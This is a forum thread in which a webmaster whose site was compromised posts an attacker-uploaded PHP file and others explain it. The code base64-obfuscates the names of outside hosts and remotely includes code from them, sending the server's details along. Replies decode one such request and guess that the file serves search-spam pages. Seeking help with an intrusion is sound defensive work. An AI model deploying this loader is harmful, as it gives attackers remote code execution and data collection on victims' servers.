SitePoint Sponsor

User Tag List

Results 1 to 3 of 3
  1. #1
    SitePoint Addict
    Join Date
    Mar 2003
    Location
    Greenville, SC
    Posts
    388
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Hacker getting into my site changing pages and uploading pages

    Hello Folks.

    I have a hacker getting into my site somehow. I suspect it is my folder permissions or a php script that needs to be removed, improved or updates.

    They are uploading the following script and naming it a random number .php. example: 115954.php . Here is the code for one of the files:

    PHP Code:
    <? error_reporting(0);$s="e";
    $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
    $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
    $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
    $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
    $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
    $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
    $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);

    $str=base64_encode($a).".".base64_encode($b)."."..".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); 

    if ((include(
    base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){

    else{
    include(
    base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);

    ?>
    What does this mean? What are they doing with this script?

  2. #2
    SitePoint Enthusiast
    Join Date
    Feb 2007
    Location
    Swindon, UK
    Posts
    50
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    By the looks of things they are sending information about your server to their website - using an include with a query string on the end.

    Really not sure for what purpose - its all just server variables and things guess they must do it for a reason.

    Anyway, if you wanted to know, this is a sample of the include they are sending back (decoded)

    http://shop.vmarket.info/?localhost.......Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3.127.0.0.1.e.C:/sokkit/site/webdesign/test.php.en-gb,en;q=0.5

    I would be more concerned personally with the fact they have been uploading files to your server!

  3. #3
    SitePoint Wizard wheeler's Avatar
    Join Date
    Mar 2006
    Location
    Gold Coast, Australia
    Posts
    1,369
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    i've seen a script that looked abit like this but trimmed down, that made it appear that
    "free-ringtones.html" and several thousand other rubbish .html files resided inside folders on a site when in fact they didn't. The result was that very quickly, all the search engines crawled these non existent files and the traffic started rolling in. I believe it occurred while performing a large transfer of files onto a new folder, where the FTP connection was somehow hijacked.

    Also, googles cached pages showed text that did not visibly exist on the site.
    Studiotime - Time Management for Web Developers
    to-do's, messages, invoicing, reporting - 30 day free trial!
    Thomas Multimedia Web Development


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •